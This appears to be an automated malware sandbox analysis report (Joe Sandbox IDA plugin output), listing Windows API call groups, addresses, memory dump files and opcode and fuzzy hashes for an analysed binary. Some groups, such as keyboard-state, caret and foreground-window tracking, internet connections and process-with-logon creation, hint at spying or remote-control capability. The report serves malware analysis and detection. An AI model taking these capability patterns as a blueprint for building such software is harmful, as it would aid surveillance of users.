                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 432972143-0
                                                                                                                        • Opcode ID: a2dc123b412e84f0ff6bc98b323b802d1faaa1ab83a8a8adba645b56cd572e14
                                                                                                                        • Instruction ID: 3d022cb2e99c0a161073e539d8431635d3c79176871bb71fa804ecb4c51e4b71
                                                                                                                        • Opcode Fuzzy Hash: a2dc123b412e84f0ff6bc98b323b802d1faaa1ab83a8a8adba645b56cd572e14
                                                                                                                        • Instruction Fuzzy Hash: 4831E4B1A04298AFEF248B64A8087FE7BB59B49314F08425BF4C2923C1C774DA48D772
                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00DC4DE8
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00DC4E16
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00DC4E44
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00DC4E7A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        • Opcode ID: 0407b513143cb9774d880c8a2ef35625d389f438e5d8567b0c33fe2d9dc08918
                                                                                                                        • Instruction ID: 56ea1bfe9f7d5fa5ceeb6af692556a258be6dda1fb145e40d0f4edd1dcecac54
                                                                                                                        • Opcode Fuzzy Hash: 0407b513143cb9774d880c8a2ef35625d389f438e5d8567b0c33fe2d9dc08918
                                                                                                                        • Instruction Fuzzy Hash: 07318C31600256AFDF219F75C855FAA7BAAFF41320F1A852DF862971A0E730D851DBB0
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32 ref: 00DF7AB6
                                                                                                                          • Part of subcall function 00DD69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD69E3
                                                                                                                          • Part of subcall function 00DD69C9: GetCurrentThreadId.KERNEL32 ref: 00DD69EA
                                                                                                                          • Part of subcall function 00DD69C9: AttachThreadInput.USER32(00000000,?,00DD8127), ref: 00DD69F1
                                                                                                                        • GetCaretPos.USER32(?), ref: 00DF7AC7
                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 00DF7B00
                                                                                                                        • GetForegroundWindow.USER32 ref: 00DF7B06
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2759813231-0
                                                                                                                        • Opcode ID: 0e209434847bf09ac459d13b4b7a474d9618f08e93a9fcc4cf5ac8050d21f8ec
                                                                                                                        • Instruction ID: ad8d35724589af2261aff2c4253697848bce383944bf021a39e053ad684b1526
                                                                                                                        • Opcode Fuzzy Hash: 0e209434847bf09ac459d13b4b7a474d9618f08e93a9fcc4cf5ac8050d21f8ec
                                                                                                                        • Instruction Fuzzy Hash: 8C31ED71D00108AFCB00EFBADC859EFBBF9EF59314B11846AE815E7211E6359E058BB1
                                                                                                                        APIs
                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DE49B7
                                                                                                                          • Part of subcall function 00DE4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DE4A60
                                                                                                                          • Part of subcall function 00DE4A41: InternetCloseHandle.WININET(00000000), ref: 00DE4AFD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1463438336-0
                                                                                                                        • Opcode ID: 4abf74f34eb397826a3098bf09b49cabcb53703ef8795ccdff30d6bcaab3db6b
                                                                                                                        • Instruction ID: 79c176a2801b4d68492f994ba47a23fe2e60ce530e7e9f4778a178ced1581d93
                                                                                                                        • Opcode Fuzzy Hash: 4abf74f34eb397826a3098bf09b49cabcb53703ef8795ccdff30d6bcaab3db6b
                                                                                                                        • Instruction Fuzzy Hash: 91212631244A41BFDB12AF62CC00FBBB7A9FF48714F04402EFA4596551EB31D820ABB4
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00DCBCD9
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00DCBCE0
                                                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00DCBCFA
                                                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DCBD29
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2621361867-0
                                                                                                                        • Opcode ID: d8664cb7e9f3b4963f509d51c0d8502c9b4039ff1ceab1ab9bb767aafaa186f2
                                                                                                                        • Instruction ID: 2da49d54f34b8600d97f06853ff4acac11f7d9337fbfcc6e320e6b5d78360ae2
                                                                                                                        • Opcode Fuzzy Hash: d8664cb7e9f3b4963f509d51c0d8502c9b4039ff1ceab1ab9bb767aafaa186f2
                                                                                                                        • Instruction Fuzzy Hash: 3021807210420AAFCF019FA5DE4AFEE3BA9EF44315F04801AFA01A3160C776CD65DB60
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00DF88A3
                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DF88BD
                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DF88CB
                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00DF88D9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2169480361-0
                                                                                                                        • Opcode ID: 57b45dc343867f76bcb3acd6ee48b0c6b1cedb3d2dc67d8b48913d5ef6b25ea2
                                                                                                                        • Instruction ID: 35ca3b24373e9074319a698f3e8378eae314b40f7530e27491627159e829a961
                                                                                                                        • Opcode Fuzzy Hash: 57b45dc343867f76bcb3acd6ee48b0c6b1cedb3d2dc67d8b48913d5ef6b25ea2
                                                                                                                        • Instruction Fuzzy Hash: A8117C31305114AFDB14AB29DC05FBA7BA9EF85360F158119F926D72A1CB64AC009BB5
                                                                                                                        APIs
                                                                                                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00DE906D
                                                                                                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00DE907F
                                                                                                                        • accept.WS2_32(00000000,00000000,00000000), ref: 00DE908C
                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00DE90A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastacceptselect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 385091864-0
                                                                                                                        • Opcode ID: b9ea555ae94bdbb5b8c8b8b3578255a0290df77cea26d5fecf6d247857addffc
                                                                                                                        • Instruction ID: cb9767d5ffb23fab41481e81f556b60d988d70a22a4c5bc147d285adddcf8293
                                                                                                                        • Opcode Fuzzy Hash: b9ea555ae94bdbb5b8c8b8b3578255a0290df77cea26d5fecf6d247857addffc
                                                                                                                        • Instruction Fuzzy Hash: 2D215471A041249FCB10DF6ACC95ADABBFCEF49710F04816AF849E7290D774DA45CBA0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DD2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00DD18FD,?,?,?,00DD26BC,00000000,000000EF,00000119,?,?), ref: 00DD2CB9
                                                                                                                          • Part of subcall function 00DD2CAA: lstrcpyW.KERNEL32(00000000,?,?,00DD18FD,?,?,?,00DD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00DD2CDF
                                                                                                                          • Part of subcall function 00DD2CAA: lstrcmpiW.KERNEL32(00000000,?,00DD18FD,?,?,?,00DD26BC,00000000,000000EF,00000119,?,?), ref: 00DD2D10
                                                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00DD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00DD1916
                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00DD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00DD193C
                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00DD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00DD1970
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                        • String ID: cdecl
                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                        • Opcode ID: 8292f087aeb748c9c4e4c29ad800617844cf4b0402886009b84d9cc081031687
                                                                                                                        • Instruction ID: eaf11f1bb043afd41306b16bcf16cd7f0da436f56d1f74b2e0818f5171aa12b3
                                                                                                                        • Opcode Fuzzy Hash: 8292f087aeb748c9c4e4c29ad800617844cf4b0402886009b84d9cc081031687
                                                                                                                        • Instruction Fuzzy Hash: 1211BE3A200301BFDB25AF74DC65ABA77A8FF44350B44902AF806CB260EB3198418BB1
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00DD715C
                                                                                                                        • _memset.LIBCMT ref: 00DD717D
                                                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00DD71CF
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00DD71D8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1157408455-0
                                                                                                                        • Opcode ID: d81a23fd5ad30b5b5a2a194c2cd87b8b040574006210980c460dc2d383eb4784
                                                                                                                        • Instruction ID: 0adba952531de1522289a8558738538ccf088ed1e13008ec54f6bcca519881b5
                                                                                                                        • Opcode Fuzzy Hash: d81a23fd5ad30b5b5a2a194c2cd87b8b040574006210980c460dc2d383eb4784
                                                                                                                        • Instruction Fuzzy Hash: A911CA75905328BAE7205BA5AC4DFEBBA7CEF45760F10429AF504E72D0D2744E848BB4
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00DD13EE
                                                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00DD1409
                                                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00DD141F
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00DD1474
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3137044355-0
                                                                                                                        • Opcode ID: 75ee06dfb907a34515d0ee554228e52f54a1055aa5ca7d9cd2e4eca75ae5b0e8
                                                                                                                        • Instruction ID: 5b52cae2c2e4c19425d296e86a63c030731d5a9e9f58ea0f0ba50017179def9f
                                                                                                                        • Opcode Fuzzy Hash: 75ee06dfb907a34515d0ee554228e52f54a1055aa5ca7d9cd2e4eca75ae5b0e8
                                                                                                                        • Instruction Fuzzy Hash: 3D214F79640309BFDB209F91ED88ADABBB8EF00744F00856BE552A7250D774EA48DF71
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00DCC285
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DCC297
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DCC2AD
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DCC2C8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: 8dd977b2770c0831e72ee36e059ba4c6e2c50abbb6d23ca2a46bc418c609e079
                                                                                                                        • Instruction ID: 75d7733e836f34aae95fac084e21145dae7861d38b50252b2f587b0327c8242c
                                                                                                                        • Opcode Fuzzy Hash: 8dd977b2770c0831e72ee36e059ba4c6e2c50abbb6d23ca2a46bc418c609e079
                                                                                                                        • Instruction Fuzzy Hash: 4B11367A900218BFDB11DB98C880F9DBBB4FB08710F204095EA04B7294D671AE10DBA4
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00DD7C6C
                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00DD7C9F
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DD7CB5
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00DD7CBC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2880819207-0
                                                                                                                        • Opcode ID: e983efbdb3ccce3547353394e12014710f5e5cf5741f2851c155a72253bb941a
                                                                                                                        • Instruction ID: 50f8142bc1db5661636943eed0e718fb38688843f86df3cebc209b667e862f88
                                                                                                                        • Opcode Fuzzy Hash: e983efbdb3ccce3547353394e12014710f5e5cf5741f2851c155a72253bb941a
                                                                                                                        • Instruction Fuzzy Hash: A5110872B08204BFC7029F7DDC08ADE7FAD9B44326F184656F825E3351E67089088770
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DAC657
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00DAC66B
                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DAC675
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3970641297-0
                                                                                                                        • Opcode ID: 0092ca0c14cd05da4d6f84c72d506c2dd65660933b1affe2bb5e9889f4b3762f
                                                                                                                        • Instruction ID: 281453a3dc1856c1d825b4da7defb55bf6decc4535a6db28f99e20541fa12d97
                                                                                                                        • Opcode Fuzzy Hash: 0092ca0c14cd05da4d6f84c72d506c2dd65660933b1affe2bb5e9889f4b3762f
                                                                                                                        • Instruction Fuzzy Hash: 8311D672511648BFDF128FA1DC40EEA7B6DFF0A364F095111FA0462160C731DC60DBA0
                                                                                                                        APIs
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00DD354D,?,00DD45D5,?,00008000), ref: 00DD49EE
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00DD354D,?,00DD45D5,?,00008000), ref: 00DD4A13
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00DD354D,?,00DD45D5,?,00008000), ref: 00DD4A1D
                                                                                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,00DD354D,?,00DD45D5,?,00008000), ref: 00DD4A50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
